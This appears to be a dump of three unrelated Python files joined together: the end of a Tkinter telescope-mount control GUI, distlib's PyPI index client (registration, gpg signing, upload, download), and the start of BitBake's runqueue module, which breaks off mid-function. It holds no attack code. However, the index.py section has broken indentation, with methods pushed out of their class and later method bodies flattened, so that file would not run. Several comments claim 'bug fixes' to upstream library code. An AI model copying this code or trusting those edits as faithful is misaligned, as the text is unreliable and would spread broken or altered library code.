        connection_thread = Thread(target=self._async_connection, args=(chosen_port,))
        connection_thread.start()
# --- Application-wide objects ---------------------------------------------
root = tk.Tk()
event_logger = EventLogger()
# NOTE(review): assumes at least one COM port is present; an empty list
# would raise IndexError on the next line — TODO confirm intended behavior.
available_ports = get_available_com_ports()
com_port_choice = tk.StringVar(value=available_ports[0])
reader = SerialReader()
# Thread that pumps the serial port; started once a connection is made.
serial_thread = Thread(target=reader.loop)
connection_manager = ConnectionManager(event_logger, reader, serial_thread, com_port_choice)
root.title("PEliminator GUI")
mover = CoordinateMover(reader, event_logger)
de = DecEstimator()
dc = DecCorrector(de, reader)
# Feeds newly appearing FITS files to the DEC corrector.
dec_corrector = RecentImagesProvider(dc, is_file_fits)
# web_server = get_web_server(mover)
# --- Main window and notebook tabs ----------------------------------------
root.geometry("800x480")
tabs = ttk.Notebook(root)
tabs.pack(expand=True)
mount_tab = tk.Frame(tabs)
mount_tab.pack(fill='both', expand=True)
tabs.add(mount_tab, text="Mount control")
correction_tab = tk.Frame(tabs)
correction_tab.pack(fill='both', expand=True)
tabs.add(correction_tab, text="Corrections")
tracking_tab = tk.Frame(tabs)
tracking_tab.pack(fill='both', expand=True)
tabs.add(tracking_tab, text="Tracking")
settings_tab = tk.Frame(tabs)
settings_tab.pack(fill='both', expand=True)
tabs.add(settings_tab, text="Settings")
log_tab = tk.Frame(tabs)
log_tab.pack(fill='both', expand=True)
tabs.add(log_tab, text="Command log")
# --- "Mount control" tab: COM-port chooser --------------------------------
connect_frame = tk.Frame(mount_tab, highlightbackground="black", highlightthickness=1)
connect_frame.pack(side=tk.TOP)
combobox = ttk.Combobox(connect_frame, textvariable=com_port_choice, values=available_ports)
combobox.pack(side=tk.RIGHT)
choose_port_button = tk.Button(connect_frame, text="Connect", command=connection_manager.connect_to_chosen_port)
choose_port_button.pack(side=tk.LEFT)
ttk.Separator(mount_tab, orient=tk.HORIZONTAL).pack(side=tk.TOP, ipady=10)
# --- "Settings" tab: image-scale parameters -------------------------------
settings_frame = tk.Frame(settings_tab, highlightbackground="black", highlightthickness=1)
settings_frame.pack(side=tk.TOP)
optics_label = tk.Label(settings_frame, text='Image scale: f[mm]=', font=('calibre', 10, 'bold'))
optics_label.pack(side=tk.LEFT)
optics_f_spin = ttk.Spinbox(settings_frame, from_=0, to=10000, width=5, textvariable=mover.vars["optics_f"])
optics_f_spin.pack(side=tk.LEFT)
optics_pixel_label = tk.Label(settings_frame, text='px[um] =', font=('calibre', 10, 'bold'))
optics_pixel_label.pack(side=tk.LEFT)
optics_pixel_spin = ttk.Spinbox(settings_frame, from_=0, to=99, width=5,
                                textvariable=mover.vars["optics_pixel"], format='%.2f', increment=0.1)
optics_pixel_spin.pack(side=tk.LEFT)
ttk.Separator(mount_tab, orient=tk.HORIZONTAL).pack(side=tk.TOP, ipady=10)
# --- "Mount control" tab: precise relative moves --------------------------
precise_frame = tk.Frame(mount_tab, highlightbackground="black", highlightthickness=1)
precise_frame.pack(side=tk.TOP)
precise_ra_desc_label = tk.Label(precise_frame, text='Precise move: RA', font=('calibre', 10, 'bold'))
precise_ra_desc_label.pack(side=tk.LEFT)
precise_ra_ctrl_spin = ttk.Spinbox(precise_frame, from_=-9999, to=9999, width=5, textvariable=mover.vars["ra_precise"])
precise_ra_ctrl_spin.pack(side=tk.LEFT)
precise_ra_ctrl_units_label = tk.Label(precise_frame, text='Units:', font=('calibre', 10, 'bold'))
precise_ra_ctrl_units_label.pack(side=tk.LEFT)
precise_ra_ctrl_combo = ttk.Combobox(precise_frame, values=possible_units, width=7,
                                     textvariable=mover.vars["ra_precise_units"])
precise_ra_ctrl_combo.pack(side=tk.LEFT)
precise_ra_ctrl_button = tk.Button(precise_frame, text='<MOVE', command=mover.move_ra)
precise_ra_ctrl_button.pack(side=tk.LEFT)
precise_dec_label = tk.Label(precise_frame, text=' DEC', font=('calibre', 10, 'bold'))
precise_dec_label.pack(side=tk.LEFT)
precise_dec_spin = ttk.Spinbox(precise_frame, from_=-9999, to=9999, width=5, textvariable=mover.vars["dec_precise"])
precise_dec_spin.pack(side=tk.LEFT)
precise_dec_units_label = tk.Label(precise_frame, text='Units:', font=('calibre', 10, 'bold'))
precise_dec_units_label.pack(side=tk.LEFT)
precise_dec_combo = ttk.Combobox(precise_frame, values=possible_units, width=7,
                                 textvariable=mover.vars["dec_precise_units"])
precise_dec_combo.pack(side=tk.LEFT)
precise_dec_button = tk.Button(precise_frame, text='<MOVE', command=mover.move_dec)
precise_dec_button.pack(side=tk.LEFT)
ttk.Separator(mount_tab, orient=tk.HORIZONTAL).pack(side=tk.TOP, ipady=10)
# --- "Mount control" tab: absolute coordinates (SET / GoTo / HALT) --------
set_coordinates_frame = tk.Frame(mount_tab, highlightbackground="black", highlightthickness=1)
set_coordinates_frame.pack(side=tk.TOP)
ra_hours_label = tk.Label(set_coordinates_frame, text='RA coordinates: H', font=('calibre', 10, 'bold'))
ra_hours_label.pack(side=tk.LEFT)
ra_hours_spin = ttk.Spinbox(set_coordinates_frame, from_=0, to=23, width=3,
                            textvariable=mover.vars["ra_hours"], wrap=True)
ra_hours_spin.pack(side=tk.LEFT)
ra_minutes_label = tk.Label(set_coordinates_frame, text='M', font=('calibre', 10, 'bold'))
ra_minutes_label.pack(side=tk.LEFT)
ra_minutes_spin = ttk.Spinbox(set_coordinates_frame, from_=0, to=59, width=3,
                              textvariable=mover.vars["ra_minutes"], wrap=True)
ra_minutes_spin.pack(side=tk.LEFT)
ra_seconds_label = tk.Label(set_coordinates_frame, text='S', font=('calibre', 10, 'bold'))
ra_seconds_label.pack(side=tk.LEFT)
ra_seconds_spin = ttk.Spinbox(set_coordinates_frame, from_=0, to=59, width=3,
                              textvariable=mover.vars["ra_seconds"], wrap=True)
ra_seconds_spin.pack(side=tk.LEFT)
set_ra_button = tk.Button(set_coordinates_frame, text='SET', command=mover.set_ra)
set_ra_button.pack(side=tk.LEFT)
goto_ra_button = tk.Button(set_coordinates_frame, text='GoTo', command=mover.goto_ra)
goto_ra_button.pack(side=tk.LEFT)
halt_ra_button = tk.Button(set_coordinates_frame, text='HALT!', command=mover.halt)
halt_ra_button.pack(side=tk.LEFT)
# NOTE(review): label says "H" but DEC is entered in degrees — probably "D".
dec_degrees_label = tk.Label(set_coordinates_frame, text='DEC coordinates: H', font=('calibre', 10, 'bold'))
dec_degrees_label.pack(side=tk.LEFT)
dec_degrees_spin = ttk.Spinbox(set_coordinates_frame, from_=-89, to=89, width=3,
                               textvariable=mover.vars["dec_degrees"], wrap=True)
dec_degrees_spin.pack(side=tk.LEFT)
dec_minutes_label = tk.Label(set_coordinates_frame, text='M', font=('calibre', 10, 'bold'))
dec_minutes_label.pack(side=tk.LEFT)
dec_minutes_spin = ttk.Spinbox(set_coordinates_frame, from_=0, to=59, width=3,
                               textvariable=mover.vars["dec_minutes"], wrap=True)
dec_minutes_spin.pack(side=tk.LEFT)
dec_seconds_label = tk.Label(set_coordinates_frame, text='S', font=('calibre', 10, 'bold'))
dec_seconds_label.pack(side=tk.LEFT)
dec_seconds_spin = ttk.Spinbox(set_coordinates_frame, from_=0, to=59, width=3,
                               textvariable=mover.vars["dec_seconds"], wrap=True)
dec_seconds_spin.pack(side=tk.LEFT)
set_dec_button = tk.Button(set_coordinates_frame, text='SET', command=mover.set_dec)
set_dec_button.pack(side=tk.LEFT)
goto_dec_button = tk.Button(set_coordinates_frame, text='GoTo', command=mover.goto_dec)
goto_dec_button.pack(side=tk.LEFT)
halt_dec_button = tk.Button(set_coordinates_frame, text='HALT!', command=mover.halt)
halt_dec_button.pack(side=tk.LEFT)
ttk.Separator(mount_tab, orient=tk.HORIZONTAL).pack(side=tk.TOP, ipady=10)
# --- "Mount control" tab: DEC drift compensation --------------------------
drift_frame = tk.Frame(mount_tab, highlightbackground="black", highlightthickness=1)
drift_frame.pack(side=tk.TOP)
dec_drift_label = tk.Label(drift_frame, text='DEC drift value: ', font=('calibre', 10, 'bold'))
dec_drift_label.pack(side=tk.LEFT)
dec_drift_spin = ttk.Spinbox(drift_frame, from_=-999, to=999, width=4, textvariable=mover.vars["dec_drift"], wrap=True)
dec_drift_spin.pack(side=tk.LEFT)
dec_drift_units_label = tk.Label(drift_frame, text='arcsek / 100s', font=('calibre', 10, 'bold'))
dec_drift_units_label.pack(side=tk.LEFT)
dec_drift_button_set = tk.Button(drift_frame, text='Set drift value', command=mover.set_dec_drift)
dec_drift_button_set.pack(side=tk.LEFT)
dec_drift_button_start = tk.Button(drift_frame, text='Compensate!', command=mover.start_dec_drift)
dec_drift_button_start.pack(side=tk.LEFT)
dec_drift_button_stop = tk.Button(drift_frame, text='STOP', command=mover.stop_dec_drift)
dec_drift_button_stop.pack(side=tk.LEFT)
ttk.Separator(mount_tab, orient=tk.HORIZONTAL).pack(side=tk.TOP, ipady=10)
# --- "Corrections" tab ----------------------------------------------------
online_frame = tk.Frame(correction_tab, highlightbackground="black", highlightthickness=1)
online_frame.pack(side=tk.TOP)
ttk.Separator(correction_tab, orient=tk.HORIZONTAL).pack(side=tk.TOP, ipady=10)
def write_correction(correction):
    """Send a newly computed correction table to the mount over serial."""
    length, payload = correction
    if reader.is_connected():
        event_logger.log_event("Entering new correction for mount!\n")
        header = f"ENTER_CORR {length}\n".encode()
        reader.write_bytes(header + payload)
        time.sleep(2)
    else:
        event_logger.log_event("Mount is not connected!\n")
# Online analyzer: computes corrections from live encoder data and
# pushes them to the mount via write_correction.
onliner = OnlineAnalyzer(encoder_data, write_correction, reader)
online_button = tk.Button(online_frame, text="Start online...", command=onliner.start)
online_button.pack(side=tk.LEFT)
correct_dec_button = tk.Button(online_frame, text="START dec correction")
# The two handlers below toggle the same button between start/stop
# states, so each one re-binds the button's command to the other.
def start_dec_correction():
    dec_corrector.start()
    correct_dec_button.configure(text="STOP dec correction", command=stop_dec_correction)
def stop_dec_correction():
    dec_corrector.kill()
    correct_dec_button.configure(text="START dec correction", command=start_dec_correction)
correct_dec_button.configure(command=start_dec_correction)
correct_dec_button.pack(side=tk.LEFT)
# Historical analysis: same analyzer, but fed from recorded data
# instead of the live encoder stream.
onliner_historic = OnlineAnalyzer(None, write_correction)
online_history_button = tk.Button(online_frame, text="Start historical analysis...", command=onliner_historic.start)
online_history_button.pack(side=tk.LEFT)
encoder_gui = CameraEncoderGUI(correction_tab, reader)
def get_and_log_correction():
    """Fetch the mount's current correction table and log the outcome."""
    data = get_correction_from_mount(reader)
    if data is None:
        # None signals the mount is not connected at all.
        event_logger.log_event("Mount is not connected!\n")
    elif not data:
        # An empty (falsy) payload means the request timed out.
        event_logger.log_event("Getting correction data timed out!\n")
    else:
        event_logger.log_event(f"Obtained recent correction data from mount:\n{data}\n")


# Fixes over the original: `tk. Button` stray space, pointless f-string
# prefixes on the constant messages above, and the "currect" typo in the
# button label.
check_current_correction_button = tk.Button(online_frame, text="Get current correction",
                                            command=get_and_log_correction)
check_current_correction_button.pack(side=tk.RIGHT)
ttk.Separator(mount_tab, orient=tk.HORIZONTAL).pack(side=tk.TOP, ipady=10)
# --- "Tracking" tab, command log, and background threads ------------------
tracking_gui = ImageTrackerGUI(tracking_tab)
serial_log = scrolledtext.ScrolledText(log_tab,
                                       font=('calibre', 10, 'normal'),
                                       background='black',
                                       foreground="red")
serial_log.pack(side=tk.BOTTOM, expand=True)
# Display-only widget; presumably EventLogger.run re-enables it while
# appending — confirm in EventLogger.
serial_log.configure(state='disabled')
logger_thread = Thread(target=lambda: event_logger.run(serial_log))
logger_thread.start()
# web_thread = Thread(target=web_server.serve_forever)
# web_thread.start()
# Blocks until the main window is closed.
root.mainloop()
print("End of main loop!")
# --- Orderly shutdown of every background worker --------------------------
# web_server.shutdown()
event_logger.kill()
onliner.kill()
onliner_historic.kill()
reader.kill()
encoder_gui.kill()
tracking_gui.kill()
logger_thread.join()
# serial_thread is only started after a successful connection, so only
# join it when a connection was actually made.
if reader.is_connected():
    serial_thread.join()
# web_thread.join()
# web_server.server_close()
|
index.py | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import hashlib
import logging
import os
import shutil
import subprocess
import tempfile
try:
from threading import Thread
except ImportError:
from dummy_threading import Thread
from . import DistlibException
from .compat import (HTTPBasicAuthHandler, Request, HTTPPasswordMgr,
urlparse, build_opener, string_types)
from .util import cached_property, zip_dir, ServerProxy
logger = logging.getLogger(__name__)

# Default index endpoint and HTTP auth realm for PyPI.
DEFAULT_INDEX = 'https://pypi.org/pypi'
DEFAULT_REALM = 'pypi'
class PackageIndex(object):
    """
    This class represents a package index compatible with PyPI, the Python
    Package Index.
    """
    # Fixed MIME multipart boundary used when encoding upload requests.
    boundary = b'----------ThIs_Is_tHe_distlib_index_bouNdaRY_$'
def __init__(self, url=None):
    """
    Initialise an instance.

    :param url: The URL of the index. If not specified, the URL for PyPI is
                used.
    :raises DistlibException: if the URL has params/query/fragment or a
                              scheme other than http/https.
    """
    self.url = url or DEFAULT_INDEX
    self.read_configuration()
    scheme, netloc, path, params, query, frag = urlparse(self.url)
    if params or query or frag or scheme not in ('http', 'https'):
        raise DistlibException('invalid repository: %s' % self.url)
    self.password_handler = None
    self.ssl_verifier = None
    self.gpg = None
    self.gpg_home = None
    with open(os.devnull, 'w') as sink:
        # Use gpg by default rather than gpg2, as gpg2 insists on
        # prompting for passwords
        for s in ('gpg', 'gpg2'):
            try:
                rc = subprocess.check_call([s, '--version'], stdout=sink,
                                           stderr=sink)
                if rc == 0:
                    self.gpg = s
                    break
            except (OSError, subprocess.CalledProcessError):
                # Fix: check_call raises CalledProcessError for a non-zero
                # exit; the original caught only OSError, so a present but
                # broken gpg binary aborted construction instead of being
                # skipped.
                pass
def _get_pypirc_command(self):
    """Return a distutils ``PyPIRCCommand`` bound to a fresh Distribution.

    Used to read and write the user's ``.pypirc`` configuration.
    """
    # Lazy imports: distutils is only needed when configuration is touched.
    from distutils.core import Distribution
    from distutils.config import PyPIRCCommand
    return PyPIRCCommand(Distribution())
def read_configuration(self):
    """Populate ``username``, ``password``, ``realm`` and ``url`` from the
    distutils ``.pypirc`` configuration.
    """
    # Let distutils do the actual parsing work.
    command = self._get_pypirc_command()
    command.repository = self.url
    cfg = command._read_pypirc()
    self.username = cfg.get('username')
    self.password = cfg.get('password')
    self.realm = cfg.get('realm', 'pypi')
    self.url = cfg.get('repository', self.url)
def save_configuration(self):
    """Persist ``username``/``password`` to ``.pypirc`` via distutils.

    ``username`` and ``password`` must be set before calling this.
    """
    self.check_credentials()
    # Delegate the file handling to distutils.
    command = self._get_pypirc_command()
    command._store_pypirc(self.username, self.password)
def check_credentials(self):
    """Ensure credentials are set and build the HTTP basic-auth handler.

    :raises DistlibException: if ``username`` or ``password`` is unset.
    """
    if self.username is None or self.password is None:
        raise DistlibException('username and password must be set')
    manager = HTTPPasswordMgr()
    _, netloc, _, _, _, _ = urlparse(self.url)
    manager.add_password(self.realm, netloc, self.username, self.password)
    self.password_handler = HTTPBasicAuthHandler(manager)
def register(self, metadata):
    """
    Register a distribution on PyPI, using the provided metadata.

    :param metadata: A :class:`Metadata` instance defining at least a name
                     and version number for the distribution to be
                     registered.
    :return: The HTTP response received from PyPI upon submission of the
             request.
    """
    self.check_credentials()
    metadata.validate()
    fields = metadata.todict()
    # PyPI expects a 'verify' action first, then the actual 'submit'.
    fields[':action'] = 'verify'
    self.send_request(self.encode_request(list(fields.items()), []))
    fields[':action'] = 'submit'
    return self.send_request(self.encode_request(list(fields.items()), []))
def _reader(self, name, stream, outbuf):
    """
    Thread runner that copies lines from *stream* into *outbuf*.

    :param name: Logical stream name, used only for debug logging.
    :param stream: Byte stream to drain; typically a pipe connected to a
                   subprocess's output.
    :param outbuf: List that receives each decoded, rstripped line.
    """
    # readline() returns b'' only at EOF, so iterate until then.
    for raw in iter(stream.readline, b''):
        line = raw.decode('utf-8').rstrip()
        outbuf.append(line)
        logger.debug('%s: %s' % (name, line))
    stream.close()
def get_sign_command(self, filename, signer, sign_password,
                     keystore=None):
    """
    Build the gpg invocation used to sign *filename*.

    :param filename: The pathname to the file to be signed.
    :param signer: The identifier of the signer of the file.
    :param sign_password: The passphrase for the signer's private key.
    :param keystore: Directory containing the verification keys; defaults
                     to the instance's ``gpg_home``.
    :return: A 2-tuple ``(cmd, signature_path)`` where ``cmd`` is a list
             suitable for :class:`subprocess.Popen`.
    """
    cmd = [self.gpg, '--status-fd', '2', '--no-tty']
    home = keystore if keystore is not None else self.gpg_home
    if home:
        cmd.extend(['--homedir', home])
    if sign_password is not None:
        # The passphrase will be fed via stdin (fd 0) in batch mode.
        cmd.extend(['--batch', '--passphrase-fd', '0'])
    sig_dir = tempfile.mkdtemp()
    sig_file = os.path.join(sig_dir, os.path.basename(filename) + '.asc')
    cmd.extend(['--detach-sign', '--armor', '--local-user',
                signer, '--output', sig_file, filename])
    logger.debug('invoking: %s', ' '.join(cmd))
    return cmd, sig_file
def run_command(self, cmd, input_data=None):
    """
    Run *cmd* in a child process, optionally feeding it *input_data*.

    :param cmd: The command to run.
    :param input_data: Optional byte string sent to the child's stdin.
    :return: ``(returncode, stdout_lines, stderr_lines)``.
    """
    popen_kwargs = {
        'stdout': subprocess.PIPE,
        'stderr': subprocess.PIPE,
    }
    if input_data is not None:
        popen_kwargs['stdin'] = subprocess.PIPE
    out_lines, err_lines = [], []
    proc = subprocess.Popen(cmd, **popen_kwargs)
    # Drain stdout/stderr on separate threads instead of communicate(),
    # leaving room for interactive use of the child process.
    readers = [
        Thread(target=self._reader, args=('stdout', proc.stdout, out_lines)),
        Thread(target=self._reader, args=('stderr', proc.stderr, err_lines)),
    ]
    for t in readers:
        t.start()
    if input_data is not None:
        proc.stdin.write(input_data)
        proc.stdin.close()
    proc.wait()
    for t in readers:
        t.join()
    return proc.returncode, out_lines, err_lines
def sign_file(self, filename, signer, sign_password, keystore=None):
"""
Sign a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The absolute pathname of the file where the signature is
stored.
"""
cmd, sig_file = self.get_sign_command(filename, signer, sign_password,
keystore)
rc, stdout, stderr = self.run_command(cmd,
sign_password.encode('utf-8'))
if rc != 0:
raise DistlibException('sign command failed with error '
'code %s' % rc)
return sig_file
def upload_file(self, metadata, filename, signer=None, sign_password=None,
filetype='sdist', pyversion='source', keystore=None):
"""
Upload a release file to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the file to be uploaded.
:param filename: The pathname of the file to be uploaded.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param filetype: The type of the file being uploaded. This is the
distutils command which produced that file, e.g.
``sdist`` or ``bdist_wheel``.
:param pyversion: The version of Python which the release relates
to. For code compatible with any Python, this would
be ``source``, otherwise it would be e.g. ``3.2``.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.exists(filename):
raise DistlibException('not found: %s' % filename)
metadata.validate()
d = metadata.todict()
sig_file = None
if signer:
if not self.gpg:
logger.warning('no signing program available - not signed')
else:
sig_file = self.sign_file(filename, signer, sign_password,
keystore)
with open(filename, 'rb') as f:
file_data = f.read()
md5_digest = hashlib.md5(file_data).hexdigest()
sha256_digest = hashlib.sha256(file_data).hexdigest()
d.update({
':action': 'file_upload',
'protocol_version': '1',
'filetype': filetype,
'pyversion': pyversion,
'md5_digest': md5_digest,
'sha256_digest': sha256_digest,
})
files = [('content', os.path.basename(filename), file_data)]
if sig_file:
with open(sig_file, 'rb') as f:
sig_data = f.read()
files.append(('gpg_signature', os.path.basename(sig_file),
sig_data))
shutil.rmtree(os.path.dirname(sig_file))
request = self.encode_request(list(d.items()), files)
return self.send_request(request)
def upload_documentation(self, metadata, doc_dir):
"""
Upload documentation to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the documentation to be
uploaded.
:param doc_dir: The pathname of the directory which contains the
documentation. This should be the directory that
contains the ``index.html`` for the documentation.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.isdir(doc_dir):
raise DistlibException('not a directory: %r' % doc_dir)
fn = os.path.join(doc_dir, 'index.html')
if not os.path.exists(fn):
raise DistlibException('not found: %r' % fn)
metadata.validate()
name, version = metadata.name, metadata.version
zip_data = zip_dir(doc_dir).getvalue()
fields = [(':action', 'doc_upload'),
('name', name), ('version', version)]
files = [('content', name, zip_data)]
request = self.encode_request(fields, files)
return self.send_request(request)
def get_verify_command(self, signature_filename, data_filename,
keystore=None):
"""
Return a suitable command for verifying a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The verifying command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
cmd.extend(['--verify', signature_filename, data_filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd
def verify_signature(self, signature_filename, data_filename,
keystore=None):
"""
Verify a signature for a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: True if the signature was verified, else False.
"""
if not self.gpg:
raise DistlibException('verification unavailable because gpg '
'unavailable')
cmd = self.get_verify_command(signature_filename, data_filename,
keystore)
rc, stdout, stderr = self.run_command(cmd)
if rc not in (0, 1):
raise DistlibException('verify command failed with error '
'code %s' % rc)
return rc == 0
def download_file(self, url, destfile, digest=None, reporthook=None):
"""
This is a convenience method for downloading a file from an URL.
Normally, this will be a file from the index, though currently
no check is made for this (i.e. a file can be downloaded from
anywhere).
The method is just like the :func:`urlretrieve` function in the
standard library, except that it allows digest computation to be
done during download and checking that the downloaded data
matched any expected value.
:param url: The URL of the file to be downloaded (assumed to be
available via an HTTP GET request).
:param destfile: The pathname where the downloaded file is to be
saved.
:param digest: If specified, this must be a (hasher, value)
tuple, where hasher is the algorithm used (e.g.
``'md5'``) and ``value`` is the expected value.
:param reporthook: The same as for :func:`urlretrieve` in the
standard library.
"""
if digest is None:
digester = None
logger.debug('No digest specified')
else:
if isinstance(digest, (list, tuple)):
hasher, digest = digest
else:
hasher = 'md5'
digester = getattr(hashlib, hasher)()
logger.debug('Digest specified: %s' % digest)
# The following code is equivalent to urlretrieve.
# We need to do it this way so that we can compute the
# digest of the file as we go.
with open(destfile, 'wb') as dfp:
# addinfourl is not a context manager on 2.x
# so we have to use try/finally
sfp = self.send_request(Request(url))
try:
headers = sfp.info()
blocksize = 8192
size = -1
read = 0
blocknum = 0
if "content-length" in headers:
size = int(headers["Content-Length"])
if reporthook:
reporthook(blocknum, blocksize, size)
while True:
block = sfp.read(blocksize)
if not block:
break
read += len(block)
dfp.write(block)
if digester:
digester.update(block)
blocknum += 1
if reporthook:
reporthook(blocknum, blocksize, size)
finally:
sfp.close()
# check that we got the whole file, if we can
if size >= 0 and read < size:
raise DistlibException(
'retrieval incomplete: got only %d out of %d bytes'
% (read, size))
# if we have a digest, it must match.
if digester:
actual = digester.hexdigest()
if digest != actual:
raise DistlibException('%s digest mismatch for %s: expected '
'%s, got %s' % (hasher, destfile,
digest, actual))
logger.debug('Digest verified: %s', digest)
def send_request(self, req):
"""
Send a standard library :class:`Request` to PyPI and return its
response.
:param req: The request to send.
:return: The HTTP response from PyPI (a standard library HTTPResponse).
"""
handlers = []
if self.password_handler:
handlers.append(self.password_handler)
if self.ssl_verifier:
handlers.append(self.ssl_verifier)
opener = build_opener(*handlers)
return opener.open(req)
def encode_request(self, fields, files):
"""
Encode fields and files for posting to an HTTP server.
:param fields: The fields to send as a list of (fieldname, value)
tuples.
:param files: The files to send as a list of (fieldname, filename,
file_bytes) tuple.
"""
# Adapted from packaging, which in turn was adapted from
# http://code.activestate.com/recipes/146306
parts = []
boundary = self.boundary
for k, values in fields:
if not isinstance(values, (list, tuple)):
values = [values]
for v in values:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"' %
k).encode('utf-8'),
b'',
v.encode('utf-8')))
for key, filename, value in files:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"; filename="%s"' %
(key, filename)).encode('utf-8'),
b'',
value))
parts.extend((b'--' + boundary + b'--', b''))
body = b'\r\n'.join(parts)
ct = b'multipart/form-data; boundary=' + boundary
headers = {
'Content-type': ct,
'Content-length': str(len(body))
}
return Request(self.url, body, headers)
def search(self, terms, operator=None):
if isinstance(terms, string_types):
terms = {'name': terms}
rpc_proxy = ServerProxy(self.url, timeout=3.0)
try:
return rpc_proxy.search(terms, operator or 'and')
finally:
rpc_proxy('close')()
|
runqueue.py | """
BitBake 'RunQueue' implementation
Handles preparation and execution of a queue of tasks
"""
# Copyright (C) 2006-2007 Richard Purdie
#
# SPDX-License-Identifier: GPL-2.0-only
#
import copy
import os
import sys
import stat
import errno
import logging
import re
import bb
from bb import msg, event
from bb import monitordisk
import subprocess
import pickle
from multiprocessing import Process
import shlex
import pprint
bblogger = logging.getLogger("BitBake")
logger = logging.getLogger("BitBake.RunQueue")
hashequiv_logger = logging.getLogger("BitBake.RunQueue.HashEquiv")
__find_sha256__ = re.compile( r'(?i)(?<![a-z0-9])[a-f0-9]{64}(?![a-z0-9])' )
def fn_from_tid(tid):
    """Return the recipe-filename portion (everything before the final ':')."""
    components = tid.rsplit(":", 1)
    return components[0]
def taskname_from_tid(tid):
    """Return the task-name portion (everything after the final ':')."""
    components = tid.rsplit(":", 1)
    return components[1]
def mc_from_tid(tid):
    """Return the multiconfig name for a tid, or "" for the default config."""
    if not tid.startswith('mc:'):
        return ""
    return tid.split(':')[1]
def split_tid(tid):
    """Split a tid into (mc, fn, taskname), discarding the mcfn element."""
    mc, fn, taskname, _mcfn = split_tid_mcfn(tid)
    return (mc, fn, taskname)
def split_mc(n):
    """Split "mc:<mc>:<rest>" into (mc, rest); plain names yield ('', n)."""
    if not n.startswith("mc:"):
        return ('', n)
    _prefix, mc, rest = n.split(":", 2)
    return (mc, rest)
def split_tid_mcfn(tid):
    """
    Decompose a task id into its (mc, fn, taskname, mcfn) components.

    A multiconfig tid has the form "mc:<mc>:<fn>:<taskname>"; a plain tid
    is "<fn>:<taskname>" with mc == "" and mcfn == fn.
    """
    if tid.startswith('mc:'):
        pieces = tid.split(':')
        mc = pieces[1]
        fn = ":".join(pieces[2:-1])
        taskname = pieces[-1]
        mcfn = "mc:" + mc + ":" + fn
    else:
        pieces = tid.rsplit(":", 1)
        mc = ""
        fn = pieces[0]
        taskname = pieces[1]
        mcfn = fn

    return (mc, fn, taskname, mcfn)
def build_tid(mc, fn, taskname):
    """Construct a tid from its components; inverse of split_tid_mcfn()."""
    if not mc:
        return fn + ":" + taskname
    return "mc:" + mc + ":" + fn + ":" + taskname
# Index used to pair up potentially matching multiconfig tasks
# We match on PN, taskname and hash being equal
def pending_hash_index(tid, rqdata):
    """
    Build the key used to pair up potentially matching multiconfig tasks.

    Tasks are considered to match when PN, taskname and unihash are all
    equal, so all three are folded into the key.
    """
    (mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
    pn = rqdata.dataCaches[mc].pkg_fn[taskfn]
    h = rqdata.runtaskentries[tid].unihash
    # Bug fix: the original concatenated the literal string "taskname"
    # rather than the task's actual name (which was unpacked but unused),
    # so the index ignored the taskname despite the stated intent above.
    return pn + ":" + taskname + ":" + h
class RunQueueStats:
    """
    Holds statistics on the tasks handled by the associated runQueue:
    completed/skipped/failed/active counts plus the fixed total.
    """
    def __init__(self, total):
        self.completed = 0
        self.skipped = 0
        self.failed = 0
        self.active = 0
        self.total = total

    def copy(self):
        """Return a duplicate carrying the current counter values."""
        duplicate = self.__class__(self.total)
        duplicate.__dict__.update(self.__dict__)
        return duplicate

    def taskFailed(self):
        self.active -= 1
        self.failed += 1

    def taskCompleted(self):
        self.active -= 1
        self.completed += 1

    def taskSkipped(self):
        # A skipped task is also counted as active; the caller balances
        # this with a later completion event.
        self.active += 1
        self.skipped += 1

    def taskActive(self):
        self.active += 1
# These values indicate the next step due to be run in the
# runQueue state machine
# NOTE(review): the gaps in the numbering suggest intermediate states were
# removed over time -- confirm against the RunQueue state handling code.
runQueuePrepare = 2
runQueueSceneInit = 3
runQueueRunning = 6
runQueueFailed = 7
runQueueCleanUp = 8
runQueueComplete = 9
class RunQueueScheduler(object):
    """
    Control the order tasks are scheduled in.
    """
    name = "basic"

    def __init__(self, runqueue, rqdata):
        """
        The default scheduler just returns the first buildable task (the
        priority map is sorted by task number)
        """
        self.rq = runqueue
        self.rqdata = rqdata
        self.numTasks = len(self.rqdata.runtaskentries)

        # Bug fix: the original wrapped the dict keys view in brackets
        # ([...keys()]), producing a one-element list instead of a list of
        # tids, which broke prio_map.index(tid) in next_buildable_task().
        self.prio_map = list(self.rqdata.runtaskentries.keys())

        self.buildable = set()
        self.skip_maxthread = {}
        self.stamps = {}
        for tid in self.rqdata.runtaskentries:
            (mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
            self.stamps[tid] = bb.build.stampfile(taskname, self.rqdata.dataCaches[mc], taskfn, noextra=True)
            if tid in self.rq.runq_buildable:
                # Bug fix: self.buildable is a set, so use add() -- the
                # original called append(), which raises AttributeError.
